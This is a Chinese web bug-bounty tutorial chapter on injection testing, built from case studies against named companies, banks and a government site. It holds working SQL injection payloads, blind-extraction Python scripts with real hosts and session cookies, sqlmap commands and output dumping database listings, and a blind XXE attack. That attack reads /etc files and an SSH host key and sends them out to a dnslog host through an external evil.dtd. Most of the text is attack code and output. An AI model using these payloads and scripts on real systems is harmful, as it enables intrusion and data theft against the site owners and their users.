前置教程:
WEB漏洞挖掘(SRC)详细教程--信息收集篇-CSDN博客
WEB漏洞挖掘(SRC)详细教程--身份认证与业务一致性-CSDN博客
WEB漏洞挖掘(SRC)详细教程--业务数据篡改-CSDN博客
2.4 用户输入合规性
2.4.1 注入测试
a. 手动注入
1.在参数中输入一个单引号”' ”,引起执行查询语句的语法错误,得到服务器的错误回显, 从而判断服务器的数据库类型信息。 根据数据库类型构造sql注入语句。
例如一个get方式的url[ http://www.Xxx.com/abc.asp?p=YY ]
修改p的参数值http://www.Xxx.com/abc.asp?p=YY and user>0
就可以判断是否是 SQL-SERVER,而还可以得到当前连接到数据库的用户名。 http://www.xxx.com/abc.asp?p=YY&n … db_name()>0
不仅可以判断是否是SQL-SERVER,而 还可以得到当前正在使用的数据库名 。
2.盲注,大部分时候web服务器关闭了错误回显。
http://www.xxx.com/abc.asp?p=1 and 1=2
sql命令不成立,结果为空或出错 ;
http://www.xxx.com/abc.asp?p=1 and 1=1
sql命令成立,结果正常返回 。
两个测试成功后,可以判断负载的sql被执行,存在sql注入漏洞。
手动注入网站示例。登录密码(‘or’1’=‘1)并成功进入管理后台。
a.aLimit后盲注
案例:同花顺一处limit后盲注(ROOT权限/跨11库)
检测发现以下地方存在SQL注入:(注入参数limit,limit后时间盲注)
[http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?class](http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?class)
ify=1&flag=fancy&limit=3&order=1&page=1&sort=totalrate&type=0&version=1.1.23.1
Payload:(延时7秒)
[http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?class](http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?class)
ify=1&flag=fancy&limit=1/**/procedure/**/analyse(extractvalue(1,benchmark(25000
000,md5(111))),1)+--+-&order=1&page=1&sort=totalrate&type=0&version=1.1.23.1
1.当前数据库用户,ROOT
2.所有数据库,共11个
a.bSql盲注
案列:263通信某APP一处SQL盲注(附验证脚本)
263网络会议 3.0 软件下载_产品客户端下载_263云通信
下载APP,"快速入会"功能,接口:
POST [http://cc.263.net/rest/netmeeting/quickLoginNet](http://cc.263.net/rest/netmeeting/quickLoginNet) HTTP/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 65
Host: cc.263.net
Connection: Keep-Alive
{"pCode":"46867588","username":"lisi","clientType":10}
注入点:pCode
bool盲注。
false:
true:
数据库用户:
BOSSAPP@192.168.99.67
python验证脚本:
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payloads = 'ABCDEFGHIJKLMNOPQRSTYVWXYZ0123456789@_.'
print '[%s] Start to retrive db User:' % time.strftime('%H:%M:%S',
time.localtime())
user = '' isEnd=False
for i in range(1, 36):
if isEnd:
break
isEnd=True
for payload in payloads:
url='/rest/netmeeting/quickLoginNet'
start_time=time.time()
data='{"pCode":"46867588\' or
MID(user(),'+str(i)+',1)=''+payload+'","username":"lisi","clientType":10}'
conn = httplib.HTTPConnection('cc.263.net', timeout=60)
conn.request(method='POST',url=url,body=data, headers=headers)
html_doc = conn.getresponse().read()
conn.close()
print '.',
if(html_doc.find('80007')>0):
isEnd=False
user += payload
print '\n[in progress]', user,
break
time.sleep(0.1)
print '\n[Done] db user is %s' % user
time.sleep(20)
a.c伪静态db2布尔盲注
案列:某银行主站伪静态DB2布尔盲注
http://.../bugs/wooyun-2016-0211479/trace/8722c6d1776df3a473e61e3dc44c1 2f9
http://.../Site/Home/CN
没waf 直接上sqlmap 未脱库
available databases [10]:
[] *DB2INST1
[] * NULLID
[*] SQLJ
[] * SYSCAT
[] *SYSFUN
[*] SYSIBM
[] *SYSIBMADM
[] *SYSPROC
[*] SYSSTAT
[*] SYSTOOLS
current database: 'CMSDB'
database management system users [1]:
[*] DB2INST1
[313 tables]
+--------------------------------+
| ADVISE_WORKLOAD |
| AREA |
| AREA_EMAIL |
| COMPANY_LOANS |
| D2S_BLOCK_TEMPLATEMAP |
| D2S_CHANEL_CHANEL_RELATIONSHIP |
| D2S_CHANNEL_BLOCKMAP |
| D2S_CHANNEL_INFO_RELATIONSHIP |
| D2S_CHANNEL_TEMPLATEMAP |
| D2S_INFO_BLOCKMAP |
| D2S_INFO_CHANNEL_RELATIONSHIP |
| D2S_INFO_INFO_RELATIONSHIP |
| D2S_INFO_TEMPLATEMAP |
| D2S_TEMPLATE |
| EMAIL_SEND_LOG |
a.d伪静态sql布尔盲注
案列:某银行主站伪静态sql布尔盲注root
http://...//cmsDeskArticle/bankCardType/1 注入点
经测试 information_schema不能用,sqlmap神器也悲伤 肯花时间的话 可以猜的出表
漏洞证明:
工具跑不了
1' or length(database())=7 and 1=1 or '1'='
1' or ascii(mid((database()),1,1))=102 and 1=1 or '1'=' f
1' or ascii(mid((database()),2,1))=120 and 1=1 or '1'=' x
1' or ascii(mid((database()),3,1))=45 and 1=1 or '1'=' -
1' or ascii(mid((database()),4,1))=98 and 1=1 or '1'=' b
1' or ascii(mid((database()),5,1))=97 and 1=1 or '1'=' a
1' or ascii(mid((database()),6,1))=110 and 1=1 or '1'=' n
1' or ascii(mid((database()),7,1))=107 and 1=1 or '1'=' k
fx-bank
1' or ascii(mid(version(),1,1))=53 and 1=1 or '1'=' m
1' or ascii(mid(version(),2,1))=46 and 1=1 or '1'=' .
1' or ascii(mid(version(),3,1))=53 and 1=1 or '1'=' 5
1' or ascii(mid(version(),4,1))=46 and 1=1 or '1'=' .
1' or ascii(mid(version(),5,1))=50 and 1=1 or '1'=' 2
1' or ascii(mid(version(),6,1))=49 and 1=1 or '1'=' 1
1' or ascii(mid(version(),7,1))=45 and 1=1 or '1'=' -
1' or ascii(mid(version(),8,1))=108 and 1=1 or '1'=' 1
1' or ascii(mid(version(),9,1))=111 and 1=1 or '1'=' o
1' or ascii(mid(version(),10,1))=103 and 1=1 or '1'=' g
m.5.21-log
1' or ascii(mid(user(),1,1))=114 and 1=1 or '1'=' r
1' or ascii(mid(user(),2,1))=111 and 1=1 or '1'=' o
1' or ascii(mid(user(),3,1))=111 and 1=1 or '1'=' o
1' or ascii(mid(user(),4,1))=116 and 1=1 or '1'=' t
1' or ascii(mid(user(),5,1))=64 and 1=1 or '1'=' @
1' or ascii(mid(user(),6,1))=108 and 1=1 or '1'=' l
root@localhost
a.e时间盲注
案列:迅雷一处时间盲注
抓的post包
POST /location/upload_peerinfo HTTP/1.1
Host: [interface.xl9.xunlei.com](http://interface.xl9.xunlei.com)
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101
Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: sessionid=CC824A20602118045BF9B8150499AD86; userid=50947382;
peerid=50E549E88890F5GQ; client=pc; v=7.10.33.358
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
{"cpu":"","devicename":"ZHONGWEN","devicetype":"pc","imei":"","memory":""}
devicename\devicetype 都是注入点
Parameter: JSON devicename ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: {"cpu":"","devicename":"ZHONGWEN' AND (SELECT * FROM
(SELECT(SLEEP(5)))DEhT) AND
'AgGq'='AgGq","devicetype":"pc","imei":"","memory":""}
Parameter: JSON devicetype ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: {"cpu":"","devicename":"ZHONGWEN","devicetype":"pc' AND (SELECT *
FROM (SELECT(SLEEP(5)))KNUs) AND 'HTgX'='HTgX","imei":"","memory":""}
available databases [6]:
[*] xl9\x81\x81omplain
[*] information_schema
[*] x
[*] xl9_location
[*] xl9_tracer
[*] xl9_user_ip_loc
[15:55:53] [INFO] fetching tables for database: 'xl9_user_ip_loc'
[15:55:53] [INFO] fetching number of tables for database 'xl9_user_ip_loc' [15:55:53] [INFO] resumed: 257
xl9_user_ip_loc 这个库挺大的 都是用户记录的ip吧 。
a.fOracle盲注
案列:新疆人社厅Oracle盲注(附验证脚本)
注入地址:
http://.../wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151 590e127808da' AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 AND 'xxx'='xxx
参数id过滤不严格导致SQLi
http://.../wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151 590e127808da' AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 AND 'xxx'='xxx
返回正常
http://.../wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151 590e127808da' AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=4 AND 'xxx'='xxx
返回不一样,判断用户名为3个字符 直接放进脚本跑。这里举例CURRENT_USER和OS_USER,其他类似
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author:
import requests
url =
"http://**.**.**.**/wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e015
1590e127808da"
payloads='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789@_.'
header = {
"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0)
Gecko/20100101 Firefox/45.0",
"Cookie":"JSESSIONID=5V1JXjMpQLtR92RxJ62KrMQLfY4t6xpdQCBfcXLHtT2yz4jsT7Gr!1
478879510",
"Accept":""
}
def getData():
user=''
for i in range(1,4,1):
for exp in list(payloads):
try:
payload = "'AND
substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1)='%s' AND 'xxx'='xxx" %
(i,''.join(exp))
r = requests.get(url +
payload,headers=header,allow_redirects=False,timeout=100)
res = r.text
#print exp
if res.find("20151130234113") >0 :
user+=exp
print '\n user is:',user,
except:
pass
print '\n[Done] Oracle user is %s' %user
def getDataBase():
user=''
for i in range(0,13,1):
for exp in list(payloads):
try:
payload = "'AND
substr(SYS_CONTEXT('USERENV','OS_USER'),%s,1)='%s' AND 'xxx'='xxx" %
(i,''.join(exp))
r = requests.get(url +
payload,headers=header,allow_redirects=False,timeout=100)
res = r.text
#print exp
if res.find("20151130234113") >0 :
user+=exp
print '\n OS_USER is:',user,
except:
pass
print '\n[Done] Oracle OS_USER is %s' %user
if __name__ == '__main__':
#len = getLength()
getData()
getDataBase()
验证结果:
a.gXxe盲注
案列:利用网易一处XXE盲注演示如何通过cloudeye配合实现文件内容读取
野生xml外部实体注入
地址:http://106.2.32.66:8080/webdav/
IP归属地:
存在一处webdav目录,支持通过PROPFIND方式提交xml结构请求 构造xxe测试payload:
PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like
Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtz3zkd [
<!ENTITY % dtd SYSTEM "http://66ae2b.dnslog.info/">
%dtd;]>
<propfind xmlns="DAV:"><allprop/></propfind>
cloudeye apache 日志:
response 返回数据:
<?xml version="1.0" encoding="utf-8" ?>
<multistatus xmlns="DAV:"><response><href>/webdav/</href>
<propstat><prop><creationdate>2015-07-13T12:13:57Z</creationdate>
<displayname><![CDATA[]]></displayname>
<resourcetype><collection/></resourcetype>
<source></source>
<supportedlock><lockentry><lockscope><exclusive/></lockscope><locktype><write/>
</locktype></lockentry><lockentry><lockscope><shared/></lockscope><locktype><wr
ite/></locktype></lockentry></supportedlock>
</prop>
<status>HTTP/1.1 200 OK</status>
</propstat>
</response>
</multistatus>
证明解析xml时尝试引用了外部资源,存在XXE漏洞
后续尝试构造xml请求获取回显失败,考虑继续通过cloudeye获取blind xxe回显结果。 创建一个获取回显结果的dtd文件:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY % send SYSTEM
'http://66ae2b.dnslog.info/?xml1=%payload;'>">
%all;
调用地址:http://...:8080/xml/evil.dtd 再次构造请求payload读取hostname:
PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like
Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % payload SYSTEM "file:///proc/sys/kernel/hostname">
<!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
<propfind xmlns="DAV:"><allprop/></propfind>
cloudeye apache日志:
获取的hostname为:classa-popoatispam1,貌似是网易popo的反垃圾邮件系统 由于读取带有换行符、#、<、>等特殊符号文件内容时,会破坏xml语法结构,导致payload 无法正常解析,所以还做不到任意文件读取,可以尝试寻找base64、urlencode编码方法来 解决,反正我是没有搞定/(ㄒoㄒ)/~~ 但是也可以读到好多有价值的内容,比如读取/etc/issue.net:
PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like
Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % payload SYSTEM "file:///etc/issue.net">
<!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
<propfind xmlns="DAV:"><allprop/></propfind>
结果为:Debian%20GNU/Linux%207
读取/etc/ssh/ssh_host_rsa_key.pub:
PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like
Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % payload SYSTEM "file:///etc/issue.net">
<!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
<propfind xmlns="DAV:"><allprop/></propfind>
结果为:
ssh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQCcdWadpFCGUL9soWpo7KIc4/WlcwkcvqOeMfnCS 4sSmT+fsQ1FMY+h6Ab+xQrvrhp4ufIN/iR92SMeIYLCxg+DSIXKdxKob9luJKdF/zl4UY/qTmRaQaAP lAgZsPHnBMKT5BW08ZMX+NzH8jQQx6xHCkx4Bqom88NMfePN0ydYwGzehS/7oh0s9JYgo8knTJ6eke7 y/ohtzMLjCoBQHfAOTtyRPoFSyfc2ksU/rZOvAPteQvmhyc1geAmngcGV0eabzhSmNHcrxqeKZ5wK7z OmoGeoEZrfxADCHlDbf6P+XJ3HjgDZg1iBHNH4hjkdNGkVCaxpRg9CD+V/G3Ddn0Xl%20root@class a-popoatispam1
b. 自动化工具检测注入
SQLmap–检测与利用SQL注入漏洞的免费开源工具
sqlmap.py –u 【指定url 】 –cookie –dbs //列出数据库
sqlmap.py –u 【指定url 】 - D 【数据库名】- -tables //列出某个库的数据表 sqlmap.py –u 【指定url 】-D 【数据库名】-T 【数据表名】–columns //列出数据表的 列名
sqlmap.py –u 【指定url 】-D dvwa -T users-C user,password –dump //把用户名密码列 出来(sqlmap自动破解密码)
某网站拖库示例
案例:兴业银行某站存在SQL注入
http://shop.cib.com.cn//?m=product&s=detail&id=457 存在注入
